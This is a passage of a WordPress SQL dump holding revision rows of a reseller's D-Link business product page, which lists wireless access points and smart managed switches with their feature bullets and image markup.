https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:36:36','2019-09-25 06:36:36','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3382,1,'2019-09-25 12:53:57','2019-09-25 04:53:57','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:53:57','2019-09-25 04:53:57','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3383,1,'2019-09-25 12:56:50','2019-09-25 04:56:50','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 